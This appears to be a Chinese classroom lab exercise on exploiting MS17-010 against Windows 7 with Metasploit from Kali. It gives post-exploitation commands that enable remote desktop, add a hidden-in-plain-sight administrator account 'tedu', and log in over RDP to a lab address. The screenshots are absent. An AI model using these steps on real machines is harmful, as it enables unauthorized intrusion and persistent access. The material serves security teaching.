MS17-010漏洞入侵
2.1 问题
利用MS17-010漏洞入侵Win7
**密码
启用远程桌面、添加用户
2.2 步骤
实现此案例需要按照如下步骤进行。
1)在kali上启动msfconsole,漏洞攻击如图-3和图-4所示
图-3
图-4
2)**密码如图-5所示,密码的hash值可以访问www.cmd5.com**
图-5
3)启用远程桌面、添加用户tedu
run getgui -e
shell
net user tedu tedu /add
net localgroup administrators tedu /add
net localgroup “Remote Desktop Users” tedu /add
4)新建终端,然后运行如下操作
rdesktop –u tedu -p tedu 192.168.198.138:3389